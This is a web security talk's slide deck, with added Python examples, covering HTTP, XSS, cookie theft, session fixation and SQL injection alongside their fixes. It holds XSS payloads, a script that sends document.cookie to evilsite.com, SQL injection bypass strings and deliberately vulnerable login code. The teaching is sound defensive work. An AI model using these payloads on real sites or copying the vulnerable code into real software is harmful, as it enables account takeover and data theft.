2. Who are you?
• Open source hacker
• github.com/bobtfish/
• Perl guy (sorry) - 160 CPAN modules
• Core team for Catalyst and Plack web
frameworks.
• Ex professional security tester / R&D
24. HTML
• The markup format that web pages are
written in.
• I’m just assuming you all know the basics
• Sorry if you don’t ;P
• Can almost always be sloppy - browser
tries to do the right thing.
39. Dynamic
• The response could just be a file on disc
• HTML, image, etc
• We're interested in when it's dynamic -
i.e. when your input changes the HTML
output.
40. GET / HTTP/1.0

HTTP/1.1 200 OK
Date: Wed, 29 Aug 2012 21:47:59 GMT
Server: Apache
Last-Modified: Wed, 27 Jul 2011 10:18:21 GMT
ETag: "1c888b-0-4a90a5e239540"
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug
49. GET / HTTP/1.0
• Headers optional after first line (in HTTP/1.0;
HTTP/1.1 makes the Host: header mandatory)
• Body can be supplied after the blank line
(\r\n\r\n) if you specify a non-zero
Content-Length
• There will be examples of this later
53. HTTP/1.1 200 OK
• Always the first line of the response
• We asked for 1.0, got 1.1 back
• 200 is the response code.
• 2xx - Success
• 3xx - Redirect
• 4xx - Client error (bad request, not found,
forbidden, etc.)
• 5xx - Server error
54. Date: Wed, 29 Aug 2012
21:47:59 GMT
• Other headers now follow. All in the format:
Key: Value
• Date: RFC 822 format (the RFC 1123 variant
with a four-digit year)
• Optional
58. Accept-Ranges: bytes
• 'Partial GET'
• Client asks for a byte range of the file
with a Range: header
• Gets back just that part (206 Partial Content)
• Used by 'download managers' to resume
• Optional
73. POST
• Used to send data back to the server
• Content-Type: application/x-www-form-urlencoded
• Has a Content-Length, and a body
• Data is encoded like this:
foo=bar&foo2=baz
74. POST
POST / HTTP/1.1
Host: www.example.com
Content-Length: 17
Content-Type: application/x-www-form-urlencoded

foo=bar&foo2=quux
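The request and response formats from the slides above, worked through as an added example (this is not code from the deck): a small Python script that builds a raw POST with the Host header, a byte-counted Content-Length and the blank line before the body, and parses a raw response into its status line, headers and body. The host, path, form fields and the sample response are constructed here from the slides' own examples.

```python
# Added example, not code from the deck: build a raw POST with a
# form-urlencoded body and parse a raw response, to show the wire format
# the slides describe. Host, path and field values are made up here.
from urllib.parse import urlencode, parse_qs

CRLF = "\r\n"


def build_post(host, path, fields):
    """Return a raw HTTP/1.1 POST request as a string."""
    body = urlencode(fields)                      # e.g. foo=bar&foo2=quux
    headers = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",                          # mandatory in HTTP/1.1
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body.encode())}",  # length in bytes, not characters
    ]
    # The blank line (\r\n\r\n) is what separates the headers from the body
    return CRLF.join(headers) + CRLF + CRLF + body


def parse_response(raw):
    """Split a raw response into (version, status, reason, headers, body)."""
    head, _, body = raw.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    parts = lines[0].split(" ", 2)                # "HTTP/1.1 200 OK"
    version, status = parts[0], int(parts[1])
    reason = parts[2] if len(parts) > 2 else ""
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")       # split at the first colon only
        headers[key.strip().lower()] = value.strip()   # names are case-insensitive
    # Only take as much body as Content-Length promises (ASCII here, so
    # characters == bytes); a request body is read the same way, which is
    # why the slides insist on a non-zero Content-Length
    length = int(headers.get("content-length", len(body)))
    return version, status, reason, headers, body[:length]


def status_class(status):
    """Map a status code to the class the slides list."""
    return {2: "success", 3: "redirect", 4: "client error",
            5: "server error"}.get(status // 100, "informational/other")


def form_fields(body):
    """Decode an application/x-www-form-urlencoded body into a dict."""
    return {k: v[0] for k, v in parse_qs(body).items()}


# Constructed from the slide's example response, trimmed to a few headers
SAMPLE_RESPONSE = CRLF.join([
    "HTTP/1.1 200 OK",
    "Date: Wed, 29 Aug 2012 21:47:59 GMT",
    "Server: Apache",
    "Content-Length: 0",
    "Content-Type: text/html",
]) + CRLF + CRLF

if __name__ == "__main__":
    print(build_post("www.example.com", "/", {"foo": "bar", "foo2": "quux"}))
    print(parse_response(SAMPLE_RESPONSE))
```

The Content-Length check in parse_response is the part worth noticing: a server reads exactly that many bytes and treats anything after them as the start of the next request, so a wrong length is a malformed request, not a harmless typo.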
75. Forms
• HTML forms are the primary means of
getting user data to the server
• With method="post" the data is in the body,
not the URL, so it doesn't get saved in
bookmarks (a GET form puts it in the query
string instead)
• <form> tag
• <input> tag
86. FAIL
• Did you spot the epic fail?
• value="<?php echo $_GET['foo'] ?>"
• Golden rule - never ever accept input
without validating it's sane
• Golden rule - never ever output anything
that may have come from external input
without encoding it
90. WHY?
• You can send: ?foo="><blink>Foo<%2Fblink>
(%2F is a URL-encoded /)
• Comes out as: <input name="foo"
value=""><blink>Foo</blink>"> - the input's
own closing quote and > are left dangling
as text
• You just added HTML to the document -
fail!
95. Javascript
• Is where it all goes really wrong
• Can change or rewrite the page
• Can be inserted inline into HTML
• foo="><script>document.removeChild(document.getElementsByTagName('html')[0])<%2Fscript>
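The "epic fail" and its fix, worked through in Python rather than PHP, as an added example that is not the deck's code: the vulnerable render drops the query-string value straight into the attribute exactly as `value="<?php echo $_GET['foo'] ?>"` does, the fixed one encodes on output, and a stdlib HTML parser is used to show which tags a browser would actually see in each case. The blink and script payloads are the slides' own; the third payload is constructed here and is the form the cookie-stealing walk-through below relies on.

```python
# Added example, not the deck's code: the deck's PHP line
#   value="<?php echo $_GET['foo'] ?>"
# re-done in Python, once as written (vulnerable) and once encoding on
# output. The payloads come from the slides; the exfiltration one is
# constructed to match the cookie-stealing walk-through.
import html
from html.parser import HTMLParser
from urllib.parse import unquote


def render_vulnerable(foo):
    """Raw input dropped into an attribute: the 'epic fail'."""
    return f'<input name="foo" value="{foo}">'


def render_fixed(foo):
    """Encode on output. quote=True also turns " and ' into entities,
    so the attribute cannot be closed early."""
    return f'<input name="foo" value="{html.escape(foo, quote=True)}">'


class TagCollector(HTMLParser):
    """Record the start tags a browser-like parser sees in the markup."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def tags_in(markup):
    parser = TagCollector()
    parser.feed(markup)
    parser.close()
    return parser.tags


# Query-string values from the slides (%2F is an encoded '/'), decoded the
# way the web server would before they reach $_GET['foo']
PAYLOAD_BLINK = unquote('"><blink>Foo<%2Fblink>')
PAYLOAD_SCRIPT = unquote(
    '"><script>document.removeChild('
    "document.getElementsByTagName('html')[0])<%2Fscript>")
# Constructed: the cookie-stealing slides' image trick as a single payload
PAYLOAD_EXFIL = unquote(
    '"><script>(new Image).src='
    "'http://evilsite.com/?data='+encodeURIComponent(document.cookie)"
    '<%2Fscript>')

if __name__ == "__main__":
    for payload in (PAYLOAD_BLINK, PAYLOAD_SCRIPT, PAYLOAD_EXFIL):
        bad, good = render_vulnerable(payload), render_fixed(payload)
        print("vulnerable:", bad, tags_in(bad))
        print("fixed:     ", good, tags_in(good))
```

Note that the fix is encoding at the point of output, not stripping "bad" characters on input: the encoded attribute still round-trips the user's text (the parser decodes the entities back), it just can no longer terminate the attribute or start a tag.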
105. More theory
• Sorry, but it’s necessary
• People’s credit card numbers are behind
login pages
• So we have to understand how logins work
to steal them
121. Sessions
• Hand each visitor a random session token,
identify them in future
• Login credentials only transmitted once
• Allows login to be SSL (and rest of site not) -
but then the session token itself travels in
the clear on every request, and anyone who
can sniff it is as good as logged in
129. Stealing cookies
• Can get cookie data from javascript
(document.cookie - unless the cookie was
set with the HttpOnly flag)
• If we find an HTML injection vulnerability,
we can run code that grabs the cookie
• "Same origin policy" - script can only read
responses from the page's own origin, so it
can't just talk to evilsite.com directly via
XMLHttpRequest.
• Cheat! Add content to the document - the
browser will happily fetch an image from
any origin.
135. Let's step through that
• Message board site gives users a cookie
when they login
• Cookie contains session token
• You post an evil message containing
Javascript
• Other users view your message
• Adds to their page: <img src=”http://
evilsite.com/?data=cookie_data” />
140. Let's step through that
• Other users' browsers execute your
javascript
• It grabs their cookie
• Adds to their page: <img src="http://
evilsite.com/?data=cookie_data" />
• User's browser tries to download the image,
sending the cookie value in the URL
145. Let's step through that
• evilsite.com records the cookie
• evilsite.com serves a 1px x 1px transparent
gif
• I can now post messages as any (still logged
in) user who viewed my message.
• Having the user's cookie allows you to
become the user
149. Did you notice the
handwave?
• I need a way to get your cookie into my
browser
• This is easy to do - find a proxy library in
your favourite programming language ;P
• Or tools you can just download
155. Session fixation
• Quite a common bug
• Allows you to specify the session ID you'd
like
• Useful for abusing XSS elsewhere
• Also good to steal logins without needing
XSS.
• /?sessionID=XXXXXXXXXXX - send the victim
this link, wait for them to log in, then use
the same ID yourself
• Fix: never accept session IDs from the URL,
and issue a fresh one when the user logs in
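The session handling from the Sessions, Stealing cookies and Session fixation slides, as one added example (not code from the deck): an in-memory session store with a login that honours `/?sessionID=...` and keeps it after login, beside one that ignores client-chosen IDs and rotates the token at login, plus the Set-Cookie line with the HttpOnly and Secure flags that blunt the cookie-stealing walk-through. The store, the request dictionaries and the attacker's token value are all constructed here; the function and class names are invented for illustration.

```python
# Added example, not from the deck: an in-memory session store with a
# login that accepts a session ID from the URL (the fixation bug) beside
# one that ignores it and rotates the token at login. The store, the
# request dicts and the attacker-chosen token are all constructed here.
import secrets
from http.cookies import SimpleCookie


class SessionStore:
    def __init__(self):
        self.sessions = {}                 # token -> {"user": name or None}

    def new_token(self):
        token = secrets.token_urlsafe(32)  # unguessable; never a counter
        self.sessions[token] = {"user": None}
        return token

    def user_for(self, token):
        entry = self.sessions.get(token)
        return entry["user"] if entry else None


def session_login_vulnerable(store, request, username, password_ok):
    """Fixation bug: /?sessionID=... is honoured and kept after login."""
    token = request.get("query", {}).get("sessionID") or request.get("cookie")
    if token is None:
        token = store.new_token()
    elif token not in store.sessions:
        store.sessions[token] = {"user": None}   # adopts an ID it never issued
    if password_ok:
        store.sessions[token]["user"] = username
    return token


def session_login_fixed(store, request, username, password_ok):
    """Only tokens the server issued count, and login gets a fresh one."""
    old = request.get("cookie")
    if old not in store.sessions:
        old = store.new_token()               # unknown or absent: issue our own
    if not password_ok:
        return old
    del store.sessions[old]                   # invalidate the pre-login token
    token = store.new_token()
    store.sessions[token]["user"] = username
    return token


def session_cookie_header(token, secure=True):
    """Set-Cookie line with the flags that blunt the cookie-stealing slides:
    HttpOnly keeps it out of document.cookie, Secure keeps it off plain HTTP."""
    cookie = SimpleCookie()
    cookie["session"] = token
    cookie["session"]["httponly"] = True
    cookie["session"]["secure"] = secure
    cookie["session"]["path"] = "/"
    return cookie.output(header="Set-Cookie:")


def fixation_demo(login):
    """Attacker sends the victim /?sessionID=<attacker's token>; the victim
    logs in. Return True if the attacker's token now identifies the victim."""
    store = SessionStore()
    attacker_token = "attackerchosen"        # constructed, attacker-picked value
    request = {"query": {"sessionID": attacker_token}, "cookie": attacker_token}
    login(store, request, "alice", password_ok=True)
    return store.user_for(attacker_token) == "alice"


if __name__ == "__main__":
    print("vulnerable hijacked:", fixation_demo(session_login_vulnerable))
    print("fixed hijacked:     ", fixation_demo(session_login_fixed))
    print(session_cookie_header(SessionStore().new_token()))
```

Rotating the token at login is what defeats fixation even if an attacker somehow gets a genuine token into the victim's browser: the pre-login token is deleted and the attacker's copy of it identifies nobody. HttpOnly does not stop the injected script from acting as the user inside the page, but it does stop the document.cookie grab the walk-through depends on.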
171. SQL Injection
• SQL used by databases, for data storage
• Tables, with columns and rows
• SELECT id, name FROM users WHERE
name = 'fred' AND password = 'example';
• SAME ISSUE AS BEFORE - if 'fred' and
'example' are pasted straight from the
form into the query text, a quote in the
input ends the string literal and the rest
of the input runs as SQL
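The slide's login query run for real, as an added example that is not from the deck: an in-memory SQLite table with the query built by string concatenation (the "same issue as before") beside the same query with bound parameters. The table rows and the two bypass inputs are constructed here; the bypasses are the generic forms of the technique, not anything specific to a real site.

```python
# Added example, not from the deck: the slide's login query against an
# in-memory SQLite table, built by string concatenation (vulnerable) and
# with bound parameters (safe). Table rows and bypass inputs are constructed.
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, password TEXT)")
    db.executemany("INSERT INTO users (name, password) VALUES (?, ?)",
                   [("fred", "example"), ("admin", "s3cret")])
    db.commit()
    return db


def sql_login_vulnerable(db, name, password):
    """Same issue as the HTML case: input pasted into the query text, so a
    quote in the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT id, name FROM users WHERE name = '%s' AND password = '%s'"
           % (name, password))
    return db.execute(sql).fetchall()


def sql_login_safe(db, name, password):
    """Placeholders: values are bound separately and never parsed as SQL,
    so a quote in the input is just a quote."""
    sql = "SELECT id, name FROM users WHERE name = ? AND password = ?"
    return db.execute(sql, (name, password)).fetchall()


# Constructed bypass inputs
ALWAYS_TRUE = "' OR '1'='1"   # as password: ... AND password = '' OR '1'='1'
COMMENT_OUT = "admin'--"      # as name: ... name = 'admin'-- (rest is a comment)

if __name__ == "__main__":
    db = make_db()
    print(sql_login_vulnerable(db, "fred", "example"))       # legitimate login
    print(sql_login_vulnerable(db, "fred", ALWAYS_TRUE))     # every row comes back
    print(sql_login_vulnerable(db, COMMENT_OUT, "whatever")) # admin, no password
    print(sql_login_safe(db, "fred", ALWAYS_TRUE))           # nothing
```

The two inputs show why the golden rule is about encoding at the output (here, handing values to the driver separately) rather than blacklisting characters: the first bypass never needs a comment and the second never needs OR, so filtering one keyword does not help.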
179. Golden Rules
• Never ever accept input without validating
it’s sane.
• Never ever output anything that may have
come from external input without encoding
it.
180. Thanks for listening!
• Hope that wasn’t too boring :)
• Feel free to come chat to me.
• Or mail me: bobtfish@bobtfish.net
• Or grab me on irc: t0m on Freenode
• More in-depth workshop on Sunday!
Editor's Notes
TCP (Reliable, ordered). Host, port number.
Request and response. GET/HEAD/POST
Headers
Add a mandatory 'Host' header
We have run out of IP addresses - this means you can have multiple sites per IP